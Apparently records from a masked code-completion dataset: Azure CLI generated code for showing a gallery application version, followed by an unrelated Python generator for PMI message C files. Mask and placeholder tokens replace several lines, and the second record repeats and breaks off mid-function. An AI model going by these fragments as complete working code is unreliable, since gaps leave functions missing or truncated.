(_schema_encryption_images_read\n ) = AAZObjectType()\n encryption_images_read = _schema_encryption_images_read\n encryption_images_read.data_disk_images = AAZListType(serialized_name\n ='dataDiskImages')\n encryption_images_read.os_disk_image = AAZObjectType(serialized_name\n ='osDiskImage')\n data_disk_images = _schema_encryption_images_read.data_disk_images\n data_disk_images.Element = AAZObjectType()\n _element = _schema_encryption_images_read.data_disk_images.Element\n _element.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n _element.lun = AAZIntType(flags={'required': True})\n os_disk_image = _schema_encryption_images_read.os_disk_image\n os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n os_disk_image.security_profile = AAZObjectType(serialized_name=\n 'securityProfile')\n security_profile = (_schema_encryption_images_read.os_disk_image.\n security_profile)\n security_profile.confidential_vm_encryption_type = AAZStrType(\n serialized_name='confidentialVMEncryptionType')\n security_profile.secure_vm_disk_encryption_set_id = AAZStrType(\n serialized_name='secureVMDiskEncryptionSetId')\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\n@register_command('sig gallery-application version show')\nclass Show(AAZCommand):\n <mask token>\n <mask token>\n\n def _handler(self, command_args):\n super()._handler(command_args)\n self._execute_operations()\n return self._output()\n <mask token>\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n _args_schema = cls._args_schema\n _args_schema.gallery_application_name = AAZStrArg(options=[\n '--application-name', '--gallery-application-name'], help=\n 'The name of the gallery application.', required=True, id_part=\n 'child_name_1')\n _args_schema.gallery_application_version_name = AAZStrArg(options=[\n '-n', '--name', '--version-name',\n '--gallery-application-version-name'], help=\n 'The name of the gallery application version.', required=True,\n id_part='child_name_2')\n _args_schema.gallery_name = AAZStrArg(options=['-r',\n '--gallery-name'], help='Gallery name.', required=True, id_part\n ='name')\n _args_schema.resource_group = AAZResourceGroupNameArg(help=\n 'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'\n , required=True)\n _args_schema.expand = AAZStrArg(options=['--expand'], help=\n 'The expand expression to apply on the operation. 
\"ReplicationStatus\" Default value is None.'\n , enum={'ReplicationStatus': 'ReplicationStatus'})\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n self.GalleryApplicationVersionsGet(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n <mask token>\n\n def _output(self, *args, **kwargs):\n result = self.deserialize_output(self.ctx.vars.instance,\n client_flatten=True)\n return result\n\n\n class GalleryApplicationVersionsGet(AAZHttpOperation):\n CLIENT_TYPE = 'MgmtClient'\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=\n False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'\n , **self.url_parameters)\n\n @property\n def method(self):\n return 'GET'\n\n @property\n def error_format(self):\n return 'ODataV4Format'\n\n @property\n def url_parameters(self):\n parameters = {**self.serialize_url_param(\n 'galleryApplicationName', self.ctx.args.\n gallery_application_name, required=True), **self.\n serialize_url_param('galleryApplicationVersionName', self.\n ctx.args.gallery_application_version_name, required=True),\n **self.serialize_url_param('galleryName', self.ctx.args.\n gallery_name, required=True), **self.serialize_url_param(\n 'resourceGroupName', self.ctx.args.resource_group, required\n =True), **self.serialize_url_param('subscriptionId', self.\n ctx.subscription_id, required=True)}\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {**self.serialize_query_param('$expand', self.ctx.\n args.expand), 
**self.serialize_query_param('api-version',\n '2022-01-03', required=True)}\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {**self.serialize_header_param('Accept',\n 'application/json')}\n return parameters\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var('instance', data, schema_builder=self.\n _build_schema_on_200)\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n cls._schema_on_200 = AAZObjectType()\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(flags={'read_only': True})\n _schema_on_200.location = AAZStrType(flags={'required': True})\n _schema_on_200.name = AAZStrType(flags={'read_only': True})\n _schema_on_200.properties = AAZObjectType(flags={\n 'client_flatten': True})\n _schema_on_200.tags = AAZDictType()\n _schema_on_200.type = AAZStrType(flags={'read_only': True})\n properties = cls._schema_on_200.properties\n properties.provisioning_state = AAZStrType(serialized_name=\n 'provisioningState', flags={'read_only': True})\n properties.publishing_profile = AAZObjectType(serialized_name=\n 'publishingProfile', flags={'required': True})\n properties.replication_status = AAZObjectType(serialized_name=\n 'replicationStatus')\n publishing_profile = (cls._schema_on_200.properties.\n publishing_profile)\n publishing_profile.advanced_settings = AAZDictType(serialized_name\n ='advancedSettings')\n publishing_profile.enable_health_check = AAZBoolType(\n serialized_name='enableHealthCheck')\n publishing_profile.end_of_life_date = AAZStrType(serialized_name\n ='endOfLifeDate')\n publishing_profile.exclude_from_latest = AAZBoolType(\n serialized_name='excludeFromLatest')\n publishing_profile.manage_actions = AAZObjectType(serialized_name\n ='manageActions')\n publishing_profile.published_date = AAZStrType(serialized_name=\n 'publishedDate', flags={'read_only': True})\n 
publishing_profile.replica_count = AAZIntType(serialized_name=\n 'replicaCount')\n publishing_profile.replication_mode = AAZStrType(serialized_name\n ='replicationMode')\n publishing_profile.settings = AAZObjectType()\n publishing_profile.source = AAZObjectType(flags={'required': True})\n publishing_profile.storage_account_type = AAZStrType(\n serialized_name='storageAccountType')\n publishing_profile.target_extended_locations = AAZListType(\n serialized_name='targetExtendedLocations')\n publishing_profile.target_regions = AAZListType(serialized_name\n ='targetRegions')\n advanced_settings = (cls._schema_on_200.properties.\n publishing_profile.advanced_settings)\n advanced_settings.Element = AAZStrType()\n manage_actions = (cls._schema_on_200.properties.\n publishing_profile.manage_actions)\n manage_actions.install = AAZStrType(flags={'required': True})\n manage_actions.remove = AAZStrType(flags={'required': True})\n manage_actions.update = AAZStrType()\n settings = (cls._schema_on_200.properties.publishing_profile.\n settings)\n settings.config_file_name = AAZStrType(serialized_name=\n 'configFileName')\n settings.package_file_name = AAZStrType(serialized_name=\n 'packageFileName')\n source = cls._schema_on_200.properties.publishing_profile.source\n source.default_configuration_link = AAZStrType(serialized_name=\n 'defaultConfigurationLink')\n source.media_link = AAZStrType(serialized_name='mediaLink',\n flags={'required': True})\n target_extended_locations = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations)\n target_extended_locations.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_extended_locations.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.extended_location = AAZObjectType(serialized_name=\n 'extendedLocation')\n _element.extended_location_replica_count = AAZIntType(\n 
serialized_name='extendedLocationReplicaCount')\n _element.name = AAZStrType()\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n extended_location = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations.Element.\n extended_location)\n extended_location.name = AAZStrType()\n extended_location.type = AAZStrType()\n target_regions = (cls._schema_on_200.properties.\n publishing_profile.target_regions)\n target_regions.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_regions.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.name = AAZStrType(flags={'required': True})\n _element.regional_replica_count = AAZIntType(serialized_name=\n 'regionalReplicaCount')\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n replication_status = (cls._schema_on_200.properties.\n replication_status)\n replication_status.aggregated_state = AAZStrType(serialized_name\n ='aggregatedState', flags={'read_only': True})\n replication_status.summary = AAZListType(flags={'read_only': True})\n summary = cls._schema_on_200.properties.replication_status.summary\n summary.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.replication_status.\n summary.Element)\n _element.details = AAZStrType(flags={'read_only': True})\n _element.progress = AAZIntType(flags={'read_only': True})\n _element.region = AAZStrType(flags={'read_only': True})\n _element.state = AAZStrType(flags={'read_only': True})\n tags = cls._schema_on_200.tags\n tags.Element = AAZStrType()\n return cls._schema_on_200\n\n\nclass _ShowHelper:\n \"\"\"Helper class for Show\"\"\"\n _schema_encryption_images_read = None\n\n @classmethod\n def _build_schema_encryption_images_read(cls, _schema):\n if cls._schema_encryption_images_read is not None:\n _schema.data_disk_images = 
(cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n return\n (cls._schema_encryption_images_read) = (_schema_encryption_images_read\n ) = AAZObjectType()\n encryption_images_read = _schema_encryption_images_read\n encryption_images_read.data_disk_images = AAZListType(serialized_name\n ='dataDiskImages')\n encryption_images_read.os_disk_image = AAZObjectType(serialized_name\n ='osDiskImage')\n data_disk_images = _schema_encryption_images_read.data_disk_images\n data_disk_images.Element = AAZObjectType()\n _element = _schema_encryption_images_read.data_disk_images.Element\n _element.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n _element.lun = AAZIntType(flags={'required': True})\n os_disk_image = _schema_encryption_images_read.os_disk_image\n os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n os_disk_image.security_profile = AAZObjectType(serialized_name=\n 'securityProfile')\n security_profile = (_schema_encryption_images_read.os_disk_image.\n security_profile)\n security_profile.confidential_vm_encryption_type = AAZStrType(\n serialized_name='confidentialVMEncryptionType')\n security_profile.secure_vm_disk_encryption_set_id = AAZStrType(\n serialized_name='secureVMDiskEncryptionSetId')\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n\n\n<mask token>\n",
"step-5": "# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n#\n# Code generated by aaz-dev-tools\n# --------------------------------------------------------------------------------------------\n\n# pylint: skip-file\n# flake8: noqa\n\nfrom azure.cli.core.aaz import *\n\n\n@register_command(\n \"sig gallery-application version show\",\n)\nclass Show(AAZCommand):\n \"\"\"Get information about a gallery application version.\n \"\"\"\n\n _aaz_info = {\n \"version\": \"2022-01-03\",\n \"resources\": [\n [\"mgmt-plane\", \"/subscriptions/{}/resourcegroups/{}/providers/microsoft.compute/galleries/{}/applications/{}/versions/{}\", \"2022-01-03\"],\n ]\n }\n\n def _handler(self, command_args):\n super()._handler(command_args)\n self._execute_operations()\n return self._output()\n\n _args_schema = None\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n\n # define Arg Group \"\"\n\n _args_schema = cls._args_schema\n _args_schema.gallery_application_name = AAZStrArg(\n options=[\"--application-name\", \"--gallery-application-name\"],\n help=\"The name of the gallery application.\",\n required=True,\n id_part=\"child_name_1\",\n )\n _args_schema.gallery_application_version_name = AAZStrArg(\n options=[\"-n\", \"--name\", \"--version-name\", \"--gallery-application-version-name\"],\n help=\"The name of the gallery application version.\",\n required=True,\n id_part=\"child_name_2\",\n )\n _args_schema.gallery_name = AAZStrArg(\n options=[\"-r\", \"--gallery-name\"],\n help=\"Gallery name.\",\n required=True,\n id_part=\"name\",\n )\n _args_schema.resource_group = AAZResourceGroupNameArg(\n help=\"Name of resource group. 
You can configure the default group using `az configure --defaults group=<name>`.\",\n required=True,\n )\n _args_schema.expand = AAZStrArg(\n options=[\"--expand\"],\n help=\"The expand expression to apply on the operation. \\\"ReplicationStatus\\\" Default value is None.\",\n enum={\"ReplicationStatus\": \"ReplicationStatus\"},\n )\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n self.GalleryApplicationVersionsGet(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n\n @register_callback\n def post_operations(self):\n pass\n\n def _output(self, *args, **kwargs):\n result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)\n return result\n\n class GalleryApplicationVersionsGet(AAZHttpOperation):\n CLIENT_TYPE = \"MgmtClient\"\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}\",\n **self.url_parameters\n )\n\n @property\n def method(self):\n return \"GET\"\n\n @property\n def error_format(self):\n return \"ODataV4Format\"\n\n @property\n def url_parameters(self):\n parameters = {\n **self.serialize_url_param(\n \"galleryApplicationName\", self.ctx.args.gallery_application_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"galleryApplicationVersionName\", self.ctx.args.gallery_application_version_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"galleryName\", self.ctx.args.gallery_name,\n required=True,\n ),\n **self.serialize_url_param(\n 
\"resourceGroupName\", self.ctx.args.resource_group,\n required=True,\n ),\n **self.serialize_url_param(\n \"subscriptionId\", self.ctx.subscription_id,\n required=True,\n ),\n }\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {\n **self.serialize_query_param(\n \"$expand\", self.ctx.args.expand,\n ),\n **self.serialize_query_param(\n \"api-version\", \"2022-01-03\",\n required=True,\n ),\n }\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {\n **self.serialize_header_param(\n \"Accept\", \"application/json\",\n ),\n }\n return parameters\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var(\n \"instance\",\n data,\n schema_builder=self._build_schema_on_200\n )\n\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n\n cls._schema_on_200 = AAZObjectType()\n\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(\n flags={\"read_only\": True},\n )\n _schema_on_200.location = AAZStrType(\n flags={\"required\": True},\n )\n _schema_on_200.name = AAZStrType(\n flags={\"read_only\": True},\n )\n _schema_on_200.properties = AAZObjectType(\n flags={\"client_flatten\": True},\n )\n _schema_on_200.tags = AAZDictType()\n _schema_on_200.type = AAZStrType(\n flags={\"read_only\": True},\n )\n\n properties = cls._schema_on_200.properties\n properties.provisioning_state = AAZStrType(\n serialized_name=\"provisioningState\",\n flags={\"read_only\": True},\n )\n properties.publishing_profile = AAZObjectType(\n serialized_name=\"publishingProfile\",\n flags={\"required\": True},\n )\n properties.replication_status = AAZObjectType(\n serialized_name=\"replicationStatus\",\n )\n\n publishing_profile = cls._schema_on_200.properties.publishing_profile\n publishing_profile.advanced_settings = AAZDictType(\n serialized_name=\"advancedSettings\",\n )\n 
publishing_profile.enable_health_check = AAZBoolType(\n serialized_name=\"enableHealthCheck\",\n )\n publishing_profile.end_of_life_date = AAZStrType(\n serialized_name=\"endOfLifeDate\",\n )\n publishing_profile.exclude_from_latest = AAZBoolType(\n serialized_name=\"excludeFromLatest\",\n )\n publishing_profile.manage_actions = AAZObjectType(\n serialized_name=\"manageActions\",\n )\n publishing_profile.published_date = AAZStrType(\n serialized_name=\"publishedDate\",\n flags={\"read_only\": True},\n )\n publishing_profile.replica_count = AAZIntType(\n serialized_name=\"replicaCount\",\n )\n publishing_profile.replication_mode = AAZStrType(\n serialized_name=\"replicationMode\",\n )\n publishing_profile.settings = AAZObjectType()\n publishing_profile.source = AAZObjectType(\n flags={\"required\": True},\n )\n publishing_profile.storage_account_type = AAZStrType(\n serialized_name=\"storageAccountType\",\n )\n publishing_profile.target_extended_locations = AAZListType(\n serialized_name=\"targetExtendedLocations\",\n )\n publishing_profile.target_regions = AAZListType(\n serialized_name=\"targetRegions\",\n )\n\n advanced_settings = cls._schema_on_200.properties.publishing_profile.advanced_settings\n advanced_settings.Element = AAZStrType()\n\n manage_actions = cls._schema_on_200.properties.publishing_profile.manage_actions\n manage_actions.install = AAZStrType(\n flags={\"required\": True},\n )\n manage_actions.remove = AAZStrType(\n flags={\"required\": True},\n )\n manage_actions.update = AAZStrType()\n\n settings = cls._schema_on_200.properties.publishing_profile.settings\n settings.config_file_name = AAZStrType(\n serialized_name=\"configFileName\",\n )\n settings.package_file_name = AAZStrType(\n serialized_name=\"packageFileName\",\n )\n\n source = cls._schema_on_200.properties.publishing_profile.source\n source.default_configuration_link = AAZStrType(\n serialized_name=\"defaultConfigurationLink\",\n )\n source.media_link = AAZStrType(\n 
serialized_name=\"mediaLink\",\n flags={\"required\": True},\n )\n\n target_extended_locations = cls._schema_on_200.properties.publishing_profile.target_extended_locations\n target_extended_locations.Element = AAZObjectType()\n\n _element = cls._schema_on_200.properties.publishing_profile.target_extended_locations.Element\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.encryption)\n _element.extended_location = AAZObjectType(\n serialized_name=\"extendedLocation\",\n )\n _element.extended_location_replica_count = AAZIntType(\n serialized_name=\"extendedLocationReplicaCount\",\n )\n _element.name = AAZStrType()\n _element.storage_account_type = AAZStrType(\n serialized_name=\"storageAccountType\",\n )\n\n extended_location = cls._schema_on_200.properties.publishing_profile.target_extended_locations.Element.extended_location\n extended_location.name = AAZStrType()\n extended_location.type = AAZStrType()\n\n target_regions = cls._schema_on_200.properties.publishing_profile.target_regions\n target_regions.Element = AAZObjectType()\n\n _element = cls._schema_on_200.properties.publishing_profile.target_regions.Element\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.encryption)\n _element.name = AAZStrType(\n flags={\"required\": True},\n )\n _element.regional_replica_count = AAZIntType(\n serialized_name=\"regionalReplicaCount\",\n )\n _element.storage_account_type = AAZStrType(\n serialized_name=\"storageAccountType\",\n )\n\n replication_status = cls._schema_on_200.properties.replication_status\n replication_status.aggregated_state = AAZStrType(\n serialized_name=\"aggregatedState\",\n flags={\"read_only\": True},\n )\n replication_status.summary = AAZListType(\n flags={\"read_only\": True},\n )\n\n summary = cls._schema_on_200.properties.replication_status.summary\n summary.Element = AAZObjectType()\n\n _element = 
cls._schema_on_200.properties.replication_status.summary.Element\n _element.details = AAZStrType(\n flags={\"read_only\": True},\n )\n _element.progress = AAZIntType(\n flags={\"read_only\": True},\n )\n _element.region = AAZStrType(\n flags={\"read_only\": True},\n )\n _element.state = AAZStrType(\n flags={\"read_only\": True},\n )\n\n tags = cls._schema_on_200.tags\n tags.Element = AAZStrType()\n\n return cls._schema_on_200\n\n\nclass _ShowHelper:\n \"\"\"Helper class for Show\"\"\"\n\n _schema_encryption_images_read = None\n\n @classmethod\n def _build_schema_encryption_images_read(cls, _schema):\n if cls._schema_encryption_images_read is not None:\n _schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images\n _schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image\n return\n\n cls._schema_encryption_images_read = _schema_encryption_images_read = AAZObjectType()\n\n encryption_images_read = _schema_encryption_images_read\n encryption_images_read.data_disk_images = AAZListType(\n serialized_name=\"dataDiskImages\",\n )\n encryption_images_read.os_disk_image = AAZObjectType(\n serialized_name=\"osDiskImage\",\n )\n\n data_disk_images = _schema_encryption_images_read.data_disk_images\n data_disk_images.Element = AAZObjectType()\n\n _element = _schema_encryption_images_read.data_disk_images.Element\n _element.disk_encryption_set_id = AAZStrType(\n serialized_name=\"diskEncryptionSetId\",\n )\n _element.lun = AAZIntType(\n flags={\"required\": True},\n )\n\n os_disk_image = _schema_encryption_images_read.os_disk_image\n os_disk_image.disk_encryption_set_id = AAZStrType(\n serialized_name=\"diskEncryptionSetId\",\n )\n os_disk_image.security_profile = AAZObjectType(\n serialized_name=\"securityProfile\",\n )\n\n security_profile = _schema_encryption_images_read.os_disk_image.security_profile\n security_profile.confidential_vm_encryption_type = AAZStrType(\n serialized_name=\"confidentialVMEncryptionType\",\n )\n 
security_profile.secure_vm_disk_encryption_set_id = AAZStrType(\n serialized_name=\"secureVMDiskEncryptionSetId\",\n )\n\n _schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images\n _schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image\n\n\n__all__ = [\"Show\"]\n",
"step-ids": [
5,
8,
9,
10,
16
]
}
|
[
5,
8,
9,
10,
16
] |
<|reserved_special_token_0|>
class G:
pmi_vers = []
cmd_list = []
cmd_hash = {}
class RE:
m = None
def match(pat, str, flags=0):
RE.m = re.match(pat, str, flags)
return RE.m
def search(pat, str, flags=0):
RE.m = re.search(pat, str, flags)
return RE.m
<|reserved_special_token_0|>
def dump_all():
def dump_enums(Out):
print('enum PMIU_CMD_ID {', file=Out)
print(' PMIU_CMD_INVALID,', file=Out)
for NAME in G.cmd_list:
print(' PMIU_CMD_%s,' % NAME, file=Out)
print('};', file=Out)
print('', file=Out)
def dump_decls(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
decls = []
if 'query-name' in v0:
if len(v0['query-attrs']):
params = get_set_params(v0['query-attrs'])
decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (
name, std_query, params))
params = get_get_params(v0['query-attrs'])
decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (
name, std_get, params))
if 'response-name' in v0:
if len(v0['response-attrs']):
params = get_set_params(v0['response-attrs'])
decls.append('int PMIU_msg_set_response_%s(%s, %s);' %
(name, std_response, params))
params = get_get_params(v0['response-attrs'])
decls.append('int PMIU_msg_get_response_%s(%s, %s);' %
(name, std_get, params))
if len(decls):
print('/* PMIU_CMD_%s */' % NAME, file=Out)
for l in decls:
print(l, file=Out)
def dump_cmd_to_id(Out):
print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)
print('{', file=Out)
t_if = ' if'
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and 'query-name' in v[NAME]:
t = v[NAME]['query-name']
if t not in prev:
cmp_list.append('strcmp(cmd, "%s") == 0' % t)
prev[t] = 1
if len(cmp_list):
print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)
print(' return PMIU_CMD_%s;' % NAME, file=Out)
t_if = ' } else if'
print(' } else {', file=Out)
print(' return PMIU_CMD_INVALID;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_str(Out, query):
namekey = query + '-name'
print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %
query, file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and namekey in v[NAME]:
t = v[NAME][namekey]
if t not in prev:
cmp_list.append(t)
prev[t] = 1
if len(cmp_list) > 0:
print(' case PMIU_CMD_%s:' % NAME, file=Out)
if len(cmp_list) == 1:
print(' return "%s";' % cmp_list[0], file=Out)
else:
print(
' return (version == PMIU_WIRE_V1) ? "%s" : "%s";'
% (cmp_list[0], cmp_list[1]), file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_response(Out):
print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',
file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_funcs(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
def dump_if_version(t_if, version, is_set, is_query):
if re.match('1\\.', version):
ver = 'PMIU_WIRE_V1'
else:
ver = 'PMIU_WIRE_V2'
if is_set:
if is_query:
print(t_if + ' (version == %s) {' % ver, file=Out)
else:
print(t_if + ' (pmi_query->version == %s) {' % ver,
file=Out)
else:
print(t_if + ' (pmi->version == %s) {' % ver, file=Out)
def dump_attrs(spaces, is_set, is_query, attrs, attrs0):
non_optional = 0
for i in range(len(attrs)):
a = attrs[i]
var = get_var(attrs0[i][0])
if is_query:
pmi = 'pmi_query'
else:
pmi = 'pmi_resp'
if a[1] == 'INTEGER':
kind = 'int'
elif a[1] == 'STRING':
kind = 'str'
elif a[1] == 'BOOLEAN':
kind = 'bool'
else:
raise Exception('Unhandled kind: ' + a[1])
if is_set:
pmiu = 'PMIU_cmd_add_' + kind
print(spaces + '%s(%s, "%s", %s);' % (pmiu, pmi, a[0],
var), file=Out)
elif RE.match('.*optional=(\\S+)', a[2]):
dflt = RE.m.group(1)
pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s, %s);' % (pmiu, a[0],
var, dflt), file=Out)
else:
pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s);' % (pmiu, a[0], var
), file=Out)
non_optional += 1
return non_optional
def dump_it(NAME, v_list, is_set, is_query, attrs):
print('', file=Out)
ret_errno = True
if is_set:
params = get_set_params(attrs)
if is_query:
ret_errno = False
print('void PMIU_msg_set_query_%s(%s, %s)' % (name,
std_query, params), file=Out)
else:
print('int PMIU_msg_set_response_%s(%s, %s)' % (name,
std_response, params), file=Out)
else:
params = get_get_params(attrs)
if is_query:
print('int PMIU_msg_get_query_%s(%s, %s)' % (name,
std_get, params), file=Out)
else:
print('int PMIU_msg_get_response_%s(%s, %s)' % (name,
std_get, params), file=Out)
print('{', file=Out)
if ret_errno:
print(' int pmi_errno = PMIU_SUCCESS;', file=Out)
print('', file=Out)
if is_set:
if is_query:
print(
' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'
% NAME, file=Out)
else:
print(
' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %
NAME, file=Out)
print(
' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'
, file=Out)
attrs_b = None
if len(v_list) > 1:
if is_query:
attrs_b = v_list[1]['query-attrs']
else:
attrs_b = v_list[1]['response-attrs']
non_optional = 0
if attrs_b is None or attrs_identical(attrs, attrs_b):
non_optional += dump_attrs(' ', is_set, is_query, attrs,
attrs)
else:
dump_if_version(' if', v_list[0]['version'], is_set,
is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs, attrs)
dump_if_version(' } else if', v_list[1]['version'],
is_set, is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs_b, attrs)
if ret_errno:
print(' } else {', file=Out)
print(
' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, "invalid version");'
, file=Out)
non_optional += 1
print(' }', file=Out)
if non_optional > 0:
print('', file=Out)
print(' fn_exit:', file=Out)
print(' return pmi_errno;', file=Out)
print(' fn_fail:', file=Out)
print(' goto fn_exit;', file=Out)
elif ret_errno:
print('', file=Out)
print(' return pmi_errno;', file=Out)
print('}', file=Out)
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
if 'query-name' in v0:
if len(v0['query-attrs']):
dump_it(NAME, v_list, True, True, v0['query-attrs'])
dump_it(NAME, v_list, False, True, v0['query-attrs'])
if 'response-name' in v0:
if len(v0['response-attrs']):
dump_it(NAME, v_list, True, False, v0['response-attrs'])
dump_it(NAME, v_list, False, False, v0['response-attrs'])
msg_h = 'src/pmi_msg.h'
msg_c = 'src/pmi_msg.c'
with open(msg_h, 'w') as Out:
dump_copyright(Out)
INC = get_include_guard(msg_h)
print('#ifndef %s' % INC, file=Out)
print('#define %s' % INC, file=Out)
print('', file=Out)
dump_enums(Out)
print('', file=Out)
dump_decls(Out)
print('', file=Out)
print('#endif /* %s */' % INC, file=Out)
with open(msg_c, 'w') as Out:
dump_copyright(Out)
for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',
'pmi_wire', 'pmi_msg']:
print('#include "%s.h"\n' % inc, file=Out)
dump_cmd_to_id(Out)
print('', file=Out)
dump_id_to_str(Out, 'query')
print('', file=Out)
dump_id_to_str(Out, 'response')
print('', file=Out)
dump_funcs(Out)
<|reserved_special_token_0|>
def get_var(name):
return name.replace('-', '_')
def get_kind(kind):
if kind == 'INTEGER':
return 'int '
elif kind == 'STRING':
return 'const char *'
elif kind == 'BOOLEAN':
return 'bool '
else:
raise Exception('unexpected kind ' + kind)
<|reserved_special_token_0|>
def get_include_guard(h_file):
h_file = re.sub('.*\\/', '', h_file)
h_file = re.sub('\\.', '_', h_file)
return h_file.upper() + '_INCLUDED'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class G:
pmi_vers = []
cmd_list = []
cmd_hash = {}
class RE:
m = None
def match(pat, str, flags=0):
RE.m = re.match(pat, str, flags)
return RE.m
def search(pat, str, flags=0):
